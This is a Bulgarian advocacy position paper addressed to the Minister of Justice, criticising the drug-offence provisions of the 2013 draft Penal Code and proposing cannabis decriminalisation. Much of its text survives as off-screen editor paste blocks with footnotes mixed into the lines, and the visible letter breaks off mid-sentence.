div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;приложението на института на „Опасния рецидив“ по Проекта. Тук имаме/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;предвид по-специално чл. 43 ал. 3 т. 1, съгласно който маловажните случаи/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;не се вземат предвид, когато става въпрос за такъв рецидив. В настоящата/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;уредба, най-типичен представител на маловажните случаи са именно/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпленията с дрогите./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;8 Виж обилната практика на нашите съдилища по този текст, в това число и на ВКС. За пример: Решение/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;№ 123 по Н.Д. № 744/2009., НК, ІІ НО и др./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;9 Виж чл. 160 ал. 2 от ЗМВР. Тук трябва да добавя, че предвид краткото време, дадено ни за изготвяне на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;това становище, нямахме възможността да изследваме как Проектът за нов Наказателен кодекс се/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;съчетава с Проекта за нов Закон за Министерство на вътрешните работи./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;18. С проекта се създава реална опасност, хора в младежките си години,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;да се изправят пред ситуация, да бъдат третирани именно като опасни/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;рецидивисти (по смисъла на закона) с всички произтичащи от това/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;последици; това обаче без самите те да представляват някаква особено/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;сериозна опасност за обществото. Напълно реално е, някой да се окаже пред/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;тази квалификация, за държане на два грама трева за лична употреба, без/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;да има, каквито и да е други „престъпни“ намерения. Би било абсолютно/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;безсмислено и жестоко някой да лежи в затвора за едно такова/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпление./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;19. Накрая, новата уредба на налагането на наказание при съкратено/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;съдебно следствие (чл. 68 от Проекта), ще постави задържаните с малки/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;количества наркотични вещества в неблагоприятната ситуация и да/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;получат по-малка редукция на наказанието./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;20. С премахването на института на „маловажния случай“, проектът не/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;само премахва възможностите за една по-гъвкава наказателна политика, но/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;и създава реална опасност от тежки несправедливости, които могат/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;напълно да разрушат нечий живот. Още повече, че става въпрос за/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпление търпящо сериозно преосмисляне в световен мащаб през/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;последните петнадесет години./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;21. Защо отпада този институт обаче, мотивите към проекта мълчат./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;22. Липсата на мотивация по този въпрос, рязко контрастира с мотивите/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;към изменението на НК, когато този институт беше въведен през 2006 г.10 В/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;тях, Министър-председателят г-н Сергей Станишев от името на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Министерски съвет се е подписал под:/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;С оглед привеждането на предвидените в Наказателния кодекс/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;санкции за притежаване на малки количества наркотични вещества в/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;съответствие с най-добрите практики в държавите-членки на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Европейския съюз, е преразгледан чл. 354а от НК и съответно е създаден/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;текст, предвиждащ по-ниско наказание (пробация или глоба) в маловажни/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;случаи – какъвто е притежаването на малки количества наркотични/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;вещества … 11/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;23. Подобни са мотивите и в докладите на различните парламентарни/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;комисии, през които е минал законопроектът тогава./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;10 ДВ бр. 75/12.09.2006/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;11 Виж на http://www.parliament.bg/bg/bills/ID/8766/ стр. 3 от Мотивите/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;24. Какво се е изменило в най-добрите практики в държавите–членки/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;на Европейския съюз от 2006 до 2013, което да налага подобно изменение?/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;– питаме ние днес./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;25. В този смисъл за нас е неясно: Какви са причините за тази/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;съществена промяна на законодателната уредба? Обмислени ли са/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;последиците от нея и целени ли са те?/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;При всички положения считаме това за една сериозна крачка назад/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;и настояваме, към момента, уредбата на института на „маловажния/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;случай“ за държане на дроги и отглеждане на канабис да не отпада./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Дефиницията „След употреба на наркотично вещество“/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;26. В Проекта се открива дефиницията на понятието „След употреба на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наркотично вещество“ (§1 т. 28 от Допълнителната разпоредба). За тази/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;дефиниция мотивите са лаконични: „Това състояние, както е известно,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;може да бъде толкова опасно, колкото и класическото пияно състояние.“12/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;27. Понятието е дефинирано като „състояние на човек, при което в/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;неговия организъм има наркотично вещество или аналог на наркотично/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;вещество“./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;28. Тази дефиниция буди сериозно безпокойство, поради изключително/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;широкия си възможен обхват./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;29. Известен научен факт е, че в тялото на човек остават следи от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наркотични вещества, дълго време след тяхната употреба, когато няма и/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;помен от някакво тяхно психическо въздействие13. Значение има и частта/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;от човешкото тяло, от която се взима пробата./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;30. След като консултирахме дефиницията с експерта в областта на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;дрогите, д-р Юлиян Караджов14. Той заяви, че от научна гледна точка тя е/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;безсмислена, доколкото, в нея не е посочен, нито методът за анализ, нито/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;праговата концентрация на веществото в организма. Допълнително,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;съществуват вещества, определени като наркотични по нашето/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;законодателство, които присъстват естествено и постоянно в човешкото/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;12 Виж в края на т. ІІІ 1 към мотивите./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;13 Следи от Коноп се откриват дни след последната му употреба, а пир някои тестове и до месец/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;14 Д-р Юлиян Караджов е завършил химия в СУ Климент Охридски, има докторска степен по биохимия/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;на мозъка, научен сътрудник на БАН. Автор на книгите „Наркотиците – почти всичко за тях“ и „Канабис –/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наука и политика“. Обучителните материали на Акедемията на МВР широко използват книгата/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;„Наркотиците – почти всичко за тях“./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;тяло, без да има какъвто и да е било техен прием (N,N Диметилтриптамин –/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;DMT)./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;31. Следователно, дефиницията не позволява да се разграничи човек/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;извършил престъпление под въздействието на наркотични вещества/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;(което, в някои случаи, оправдава едно различно наказателно-правно/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;третиране), от човек извършил престъпление дълго време след като това/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;въздействие е отминало./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;32. Тази широка (юридически) и некоректна (научно) дефиниция ще/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;създаде опасност от сериозен произвол при приложението на Проекта и/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;най-вече при:/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;- чл. 83 ал. 3 т. 3 – забрана за освобождаване от наказателна отговорност/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;и замяната ѝ с административно наказание;/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;- няколкото състава от Особената част, в които обстоятелството „след/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;употреба на наркотично вещество“ е предвидено като квалифициращо. От/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;най-голямо практическо значение ще бъде управлението на МПС (чл. 458)./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;33. Предвид гореизложеното предлагаме:/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Да се преработи дефиницията, като се стесни нейния смислов/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;обхват до състояние „под въздействието на наркотични вещества”,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;като при всички положения се определят гранични стойности на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;тяхната концентрация в определена част от човешкия организъм/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;(подобно на дефиницията „пияно състояние“)./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Добавянето на ново наказание „Лишаване от право“/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;34. В сравнение с настоящата уредба на престъпленията срещу дрогите/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;(чл. 354а – 354в), в проекта се забелязва засилена употреба на наказанието/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;„лишаване от право”./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;35. Сега това наказание е предвидено като възможност само в три/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;случая: чл. 354а ал. 4; чл. 354б ал. 2 т. 3 и чл. 354б ал. 4 и 5. Всички тези/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;случаи се отнасят към лица с определени професионални качества – лекари/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;или такива, които се занимават с контрол върху наркотичните вещества. В/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;този смисъл, лишаването от права е логична последица от качеството на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;извършителя на престъплението./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;36. Съвсем друга е ситуацията по проекта. Единствените две/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпления, за които лишаването от права не е предвидено са тези по чл./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;508 ал. 1 и 2 (производство на растения и суровина). За всички останали/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпления извършителите са заплашени от това да бъдат лишени от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;права по чл. 60 – да заемат определена длъжност и упражняват определена/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;професия или дейност15. Наистина, в чл. 60 ал. 3 се казва, че това наказание/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;„се налага в предвидените в този кодекс случаи, когато упражняването на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;правата не е съвместимо с характера на извършеното престъпление“, но/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;това не ни помага много за разберем кога може разумно да очакваме това/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наказание да се наложи./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;37. Тази промяна не изглежда логична. Масовият случай на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпления по проекта ще бъде по чл. 510 ал. 1 т. 1 – държане на коноп./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Изглежда трудно предвидимо отсега, да си представим ситуация, какви/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;точно права няма да са съвместими с характера на извършеното/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпление. Отвореният текст на чл. 60 от проекта, обаче дава/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;възможност и за развиване на сериозен произвол в тази насока, който/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;следва да бъде ограничен още в законовия текст, а не впоследствие от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;съдебната практика./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;38. В този смисъл предлагаме:/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наказанието „лишаване от права по чл. 60“ да отпадне напълно като/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;възможност за наказание за престъпленията по чл. 508 – 514 от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;проекта или да се резервира към конкретни текстове, при които/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наистина може да има предвидим смисъл./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Възможности за подобрение/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;39. Създаването на нов Наказателен кодекс е възможност, която не бива/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;да се пропилява с лека ръка от българското общество. Възможно е,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;следващият половин век от нашето развитие да бъде белязан от неговото/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;действие. Поколения още неродени юристи, ще спорят върху текстовете,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;които пишем днес. Това е наша велика отговорност!/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;15 За нуждите на анализа си ще оставя настрана наказанието по чл. 60 ал. 2, което се отнася само за/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;чужденците./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;40. Дошло е времето откровено да погледнем назад и да оценим ясно/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наказателната си политика спрямо дрогите, провеждана през последните/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;близо четиридесет години16./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;41. Дори разгледана единствено само като брой хора, употребяващи/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наркотични вещества, единствената дума за тази политика е – Провал!/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Според официалните данни, през 2013 година, броят на българските/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;граждани, на възраст между 15 и 64 години, употребили наркотично/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;вещество поне веднъж в живота си, е между 560 – 570 000 души. Това е/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;увеличение спрямо 2003 с 40%17. Очевидно наказателната ни политика не/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;работи за постигане на обявените си цели./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;42. В същото време, този немалък сегмент от българското общество е/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;криминализиран в една или друга степен, а от икономическа гледна точка,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;една сериозна индустрия е изхвърлена в черния или сивия сектор. Преките/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;и косвените, финансови и морални загуби за обществото ни са гигантски,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;като единственото, което обещават, е само да се увеличават./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;43. Необходимо е да се огледаме за случващото се по света и да видим, че/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;сред държавите от т.нар. „западни демокрации“, стоим като любопитна/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;реликва – пример за лоша, неразумна, некачествена и контрапродуктивна/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;политика по отношение на дрогите./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;44. Допълнително, настоящата наказателна политика, не позволява или/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;сериозно затруднява, изследването и ползването на положителните/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;качества на най-разпространеното наркотично вещество18 – конопа./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Последните години доказаха несъмнената му полза при някои заболявания,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;а за индустриалните му качества следва да питаме бабите и дядовците си./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;45. Наказателния кодекс несъмнено играе значима роля в държавната/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;ни политика по отношение на дрогите. Ето защо, предлагаме в него:/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;да се зададе определено ниво на търпимост (декриминализация)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;спрямо отглеждането и държането на определено количество коноп от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;пълнолетни лица;/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;16 Престъпленията по чл.чл. 354а – 354в са създадени в правния мир на Република България през 1975 г./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;с ДВ бр. 95/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;17 Виж Проекта за националната стратегия за борба с наркотиците изготвен от Националния съвет по/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наркотичните вещества (2014-2018)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;18 Пак там/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наказателната репресия да бъде насочена най-вече към случаите на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;значими престъпни групи за производство и разпространение на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наркотици, както и към изпирането на парични потоци;/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;случаите на непълнолетни задържани с наркотични вещества да/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;бъдат ползвани не толкова за наказателна репресия спрямо тях,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;колкото за разследване на начина, по който наркотичното вещество се/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;е озовало в тях и като възможност за консултация със специалист,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;който да прецени наличието или отсъствието на проблемна употреба./div
a href=http://promena.org/Stanovishte%20NK%20Dvijenie%20Promena.pdfСвали PDF версия
/aa href=http://promena.org/Prilojenie1.pdfПриложение 1/a
a href=http://promena.org/Prilojenie2.pdfПриложение 2/a

До Г-жа Зинаида Златанова
Министър на правосъдието на Република България

Копие до Г-жа Вивиан Рединг
Европейски комисар по правосъдие,основни права и гражданство

СТАНОВИЩЕ относно проекта за нов Наказателен кодекс, изготвено от „Движение Промена“ и подкрепено от „Рестарт – пациенти и експерти за медицински коноп“ и „Медицинска марихуана България“

Координати за контакт: Адв. Калин Ангелов

Съдържание и Предложения:

1. Искане за удължаване на обществената дискусия по проекта,

позволяващо сериозното изследване, обмисляне и консултиране на

проекта във всички негови части (§§ 1-3)

2. Кои сме ние? (§§ 4-8)

3. Положителни моменти в предложената уредба (§ 9)

4. Негативни моменти в предложената уредба (§§10 – 38)

a. Премахване на института на маловажния случаи (§§12 – 25)

- считаме това за една сериозна крачка назад и

настояваме, към момента, уредбата на института на

„маловажния случай“ за държане на дроги и

отглеждане на канабис да не отпада.

b. Дефиницията „след употреба на наркотично вещество“ (§§ 26 –

33)

- следва да се преработи дефиницията, като се стесни

нейният смислов обхват до състояние „под

въздействието на наркотични вещества”, като при

всички положения се определят гранични

стойности на тяхната концентрация в определена

част от човешкия организъм (подобно на

дефиницията „пияно състояние“).

c. Добавяне на ново наказание „Лишаване от право“ (§§ 34 – 38)

- наказанието „лишаване от права по чл. 60“ да

отпадне напълно като възможност за наказание за

престъпленията по чл. 508 – 514 от проекта или да

се резервира към конкретни текстове, при които

може да има предвидим смисъл.

5. Възможности за подобрение (§§ 39 – 45)

- да се зададе определено ниво на търпимост

(декриминализация) спрямо отглеждането и

държането на определено количество коноп от

пълнолетни лица;

- наказателната репресия да бъде насочена най-вече

